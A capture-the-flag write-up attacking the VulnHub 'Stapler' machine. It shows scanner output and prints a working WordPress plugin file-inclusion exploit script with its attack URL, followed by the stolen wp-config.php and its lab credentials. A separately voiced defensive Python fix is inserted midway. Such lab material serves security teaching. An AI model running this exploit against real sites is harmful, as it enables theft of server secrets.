.        :     .,::      .::::::::-.  
;;,.    ;;;    `;;;,  .,;;  ;;,   `';,
[[[[, ,[[[[,     '[[,,[['   `[[     [[
$$$$$$$$"$$$      Y$$$P      $$,    $$
888 Y88" 888o   oP"``"Yo,    888_,o8P'
MMM  M'  "MMM,m"       "Mm,  MMMMP"`  

[VulnHub] Stapler Writeup

This writeup shows the methods I used to attack and gain root access to the Stapler: 1 challenge from VulnHub.com. The goal of this vulnerable machine is to get root access and to read the contents of flag.txt. We are informed that there are at least 2 ways to get limited access and at least 3 different ways to get root. Let's see what we can find.

To start off I ran netdiscover to locate the IP Address of the Stapler virtual machine.

netdiscover -r 192.168.1.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     08:00:27:e0:5b:39      1      60  Cadmus Computer Systems     
 192.168.1.119   08:00:27:05:8b:0f      1      60  Cadmus Computer Systems

Now that I have the IP Address (192.168.1.119) of the machine that I’m attacking, I run an nmap scan against all TCP ports on the target.

nmap -p 1-65535 -T5 -A -v 192.168.1.119

Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-21 21:49 EDT
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:49
Completed NSE at 21:49, 0.00s elapsed
Initiating NSE at 21:49
Completed NSE at 21:49, 0.00s elapsed
Initiating ARP Ping Scan at 21:49
Scanning 192.168.1.119 [1 port]
Completed ARP Ping Scan at 21:49, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:49
Completed Parallel DNS resolution of 1 host. at 21:50, 13.01s elapsed
Initiating SYN Stealth Scan at 21:50
Scanning 192.168.1.119 [65535 ports]
Discovered open port 3306/tcp on 192.168.1.119
Discovered open port 53/tcp on 192.168.1.119
Discovered open port 22/tcp on 192.168.1.119
Discovered open port 21/tcp on 192.168.1.119
Discovered open port 139/tcp on 192.168.1.119
Discovered open port 80/tcp on 192.168.1.119
SYN Stealth Scan Timing: About 45.53% done; ETC: 21:51 (0:00:37 remaining)
Discovered open port 666/tcp on 192.168.1.119
Discovered open port 12380/tcp on 192.168.1.119
Completed SYN Stealth Scan at 21:51, 55.06s elapsed (65535 total ports)
Initiating Service scan at 21:51
Scanning 8 services on 192.168.1.119
Completed Service scan at 21:51, 18.56s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.119
NSE: Script scanning 192.168.1.119.
Initiating NSE at 21:51
NSE: [ftp-bounce] Couldn't resolve scanme.nmap.org, scanning 10.0.0.1 instead.
Completed NSE at 21:52, 46.29s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 1.01s elapsed
Nmap scan report for 192.168.1.119
Host is up (0.00024s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_  256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X (workgroup: RED)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 53
|   Version: .7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: ConnectWithDatabase, SupportsLoadDataLocal, SupportsTransactions, SupportsCompression, ODBCClient, DontAllowDatabaseTableColumn, LongPassword, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolOld, IgnoreSigpipes, InteractiveClient, FoundRows, Speaks41ProtocolNew, Support41Auth
|   Status: Autocommit
|_  Salt: 0r\x0EBi\x05!\x1A\x0E^	`SyP8`%CH
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:05:8B:0F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.026 days (since Tue Jun 21 21:14:25 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   RED<00>              Flags: <unique><active>
|   RED<03>              Flags: <unique><active>
|   RED<20>              Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED
|   Domain name: 
|   FQDN: red
|_  System time: 2016-06-10T17:00:37+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.1.119

NSE: Script Post-scanning.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.02 seconds
           Raw packets sent: 131126 (5.771MB) | Rcvd: 64 (3.116KB)

Looks like there is an Apache server running on port 12380; let's feed that address/port combo into nikto and see what it finds.

nikto -host 192.168.1.119:12380

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.119
+ Target Hostname:    192.168.1.119
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2016-06-22 00:11:17 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.119' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2016-06-22 00:14:17 (GMT-4) (180 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto’s results show that SSL is enabled on the Apache server and that there are some interesting directories available (“/admin112233/”, “/blogblog/”, “/phpmyadmin/”). Now that I am done with the automated enumeration phase it’s time to take a look at these directories using Firefox to see what they offer. Connecting to “https://192.168.1.119:12380/phpmyadmin/” presents a phpMyAdmin login page, and “https://192.168.1.119:12380/blogblog/” appears to be a WordPress blog for the Initech company.

After poking around on the blog and looking for typical WordPress directories I am convinced that this is a legit WordPress blog and not one of the many tricks that Stapler has to offer. Time to run WPScan against the blog for a more thorough enumeration of its WordPress version information as well as available plugins and themes that are running on the site.

wpscan --url https://192.168.1.119:12380/blogblog/ --enumerate ap --enumerate at

___________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: https://192.168.1.119:12380/blogblog/
[+] Started: Thu Jun 23 05:33:19 2016

[!] The WordPress 'https://192.168.1.119:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.1.119:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.1.119:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.1.119:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.119:12380/blogblog/wp-includes/

[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 21 vulnerabilities identified from the version number

[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7979
    Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8111
    Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
    Reference: https://twitter.com/klikkioy/status/624264122570526720
    Reference: https://klikki.fi/adv/wordpress3.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection 
    Reference: https://wpvulndb.com/vulnerabilities/8126
    Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
    Reference: https://wpvulndb.com/vulnerabilities/8130
    Reference: https://core.trac.wordpress.org/changeset/33536
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8131
    Reference: https://core.trac.wordpress.org/changeset/33529
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8132
    Reference: https://core.trac.wordpress.org/changeset/33541
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8133
    Reference: https://core.trac.wordpress.org/changeset/33549
    Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8186
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8187
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
    Reference: https://wpvulndb.com/vulnerabilities/8188
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5

[!] Title: WordPress  3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8358
    Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8376
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36435
    Reference: https://hackerone.com/reports/110801
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8377
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36444
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7

[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
    Reference: https://wpvulndb.com/vulnerabilities/8473
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
    Reference: https://wpvulndb.com/vulnerabilities/8474
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8475
    Reference: https://codex.wordpress.org/Version_4.5
[i] Fixed in: 4.5

[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8488
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
    Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
    Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2

[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
    Reference: https://wpvulndb.com/vulnerabilities/8489
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
    Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
    Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
    Reference: http://avlidienbrunn.com/wp_some_loader.php
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8

[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
    Reference: https://wpvulndb.com/vulnerabilities/8518
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
[i] Fixed in: 4.5.3

[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8519
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
    Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
[i] Fixed in: 4.5.3

[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
    Reference: https://wpvulndb.com/vulnerabilities/8520
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
[i] Fixed in: 4.5.3

[+] WordPress theme in use: bhost - v1.2.9

[+] Name: bhost - v1.2.9
 |  Latest version: 1.2.9 (up to date)
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/readme.txt
 |  Style URL: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/style.css
 |  Theme Name: BHost
 |  Theme URI: Author: Masum Billah
 |  Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
 |  Author: Masum Billah
 |  Author URI: http://getmasum.net/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating all plugins (may take a while and use a lot of system resources) ...

   Time: 00:04:39 <=====================> (60690 / 60690) 100.00% Time: 00:04:39

[+] We found 4 plugins:

[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
 |  Latest version: 1.0 (up to date)
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.1.119:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

[+] Name: akismet
 |  Latest version: 3.1.11 
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: shortcode-ui - v0.6.2
 |  Latest version: 0.6.2 (up to date)
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/plugins/shortcode-ui/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] Directory listing is enabled: https://192.168.1.119:12380/blogblog/wp-content/plugins/shortcode-ui/

[+] Name: two-factor
 |  Latest version: 0.1-dev-20160412 
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/plugins/two-factor/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.1.119:12380/blogblog/wp-content/plugins/two-factor/

[+] Enumerating all themes (may take a while and use a lot of system resources) ...

   Time: 00:01:04 <=====================> (13139 / 13139) 100.00% Time: 00:01:04

[+] We found 1 themes:

[+] Name: bhost - v1.2.9
 |  Latest version: 1.2.9 (up to date)
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/readme.txt
 |  Style URL: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/style.css
 |  Theme Name: BHost
 |  Theme URI: Author: Masum Billah
 |  Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
 |  Author: Masum Billah
 |  Author URI: http://getmasum.net/

[+] Finished: Thu Jun 23 05:39:06 2016
[+] Requests Done: 73889
[+] Memory used: 196.32 MB
[+] Elapsed time: 00:05:47

After letting WPScan do a thorough scan, it shows that the WordPress blog is running 4 plugins and 1 theme. It also found a bunch of known vulnerabilities, mostly XSS plus an SQL injection, which look promising. Continuing to enumerate, I use searchsploit to see if there is any exploit code available for the WordPress theme and plugins that were found in the previous step. When using searchsploit, make sure to try different variations of the search terms to get the best results possible.

searchsploit wordpress advanced video

---------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                      |  Path
                                                                                                    | (/usr/share/exploitdb/platforms)
---------------------------------------------------------------------------------------------------- ----------------------------------
WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)                                    | ./php/webapps/39646.py
---------------------------------------------------------------------------------------------------- ----------------------------------

Looks like there is exploit code available for the “WordPress Advanced Video Plugin 1.0”. Let's take a look at the code to see what it does and how it works.

cat /usr/share/exploitdb/platforms/php/webapps/39646.py

#!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2

#	Timeline
#	03/24/2016 - Bug discovered
#	03/24/2016 - Initial notification of vendor
#	04/01/2016 - No answer from vendor, public release of bug 


# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:

#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);


# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
	numbers = re.findall(r'\d+',line)
	id = numbers[-1]
	id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
	if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
		urls=re.findall('"(https?://.*?)"', line)
		print urllib2.urlopen(urls[0]).read()

Looking at this script shows that it will first connect to “https://192.168.1.119:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=123&short=1&term=1&thumb=../wp-config.php”, which creates a new blog post whose featured image file contains the contents of “wp-config.php”. It then locates the URL of that image and displays its contents, which should be the result of the LFI. Using this script in its provided form did not display the contents of the file, so I did these steps manually. After connecting to “https://192.168.1.119:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=123&short=1&term=1&thumb=../wp-config.php”, a new blog post is created which contains a link to an image file stored in “https://192.168.1.119:12380/blogblog/wp-content/uploads/”. I downloaded this image and viewed its contents…
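The root cause described above is twofold: the `ave_publishPost` action was reachable by any unauthenticated caller through admin-ajax.php, and the `thumb` parameter went straight into `file_get_contents()`, which happily reads a local path instead of fetching a remote image. The plugin itself is PHP; the block below is an added example in Python (not the plugin's code and not from the writeup) that models the two checks a maintainer would add: an authorization gate and a scheme/host allow-list on the thumbnail URL. The handler name `handle_publish_post` and the dict-based request are hypothetical; the `publish_posts` capability string follows WordPress naming.

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def validate_thumb_url(value):
    """Accept only absolute http(s) URLs that carry a host.

    A bare path ("../wp-config.php"), a PHP stream wrapper ("php://...") or a
    file:// URL would all make a file_get_contents()-style fetch read from the
    local filesystem instead of downloading a thumbnail, so they are rejected.
    Returns a bool.
    """
    if not isinstance(value, str):
        return False
    parsed = urlparse(value.strip())
    return parsed.scheme in ALLOWED_SCHEMES and bool(parsed.hostname)


def handle_publish_post(params, user_caps):
    """Hypothetical model of a hardened publish handler.

    params    -- request parameters as a dict (title, term, thumb)
    user_caps -- set of capabilities of the caller; an anonymous caller has none
    Returns ("ok", data) or ("error", reason).
    """
    # Authorization comes first: the original action ran for any caller.
    if "publish_posts" not in user_caps:
        return ("error", "insufficient capability")

    title = str(params.get("title", "")).strip()
    if not title:
        return ("error", "title required")

    thumb = str(params.get("thumb", ""))
    if not validate_thumb_url(thumb):
        return ("error", "thumb must be an absolute http(s) URL")

    # A real handler would fetch the remote thumbnail here and create the post.
    return ("ok", {"title": title, "thumb": thumb})


if __name__ == "__main__":
    # Constructed inputs: the shape of the request from the writeup, then a benign one.
    print(handle_publish_post({"title": "123", "thumb": "../wp-config.php"}, set()))
    print(handle_publish_post({"title": "123", "thumb": "../wp-config.php"}, {"publish_posts"}))
    print(handle_publish_post({"title": "demo", "thumb": "https://example.com/i.jpg"}, {"publish_posts"}))
```

Note that the allow-list is deliberately positive (only `http`/`https` with a host) rather than a blocklist of `../` sequences: percent-encoded traversal, `php://filter` and `file://` all fail the same test without needing their own rule.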

cat 1284507121.jpeg

<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
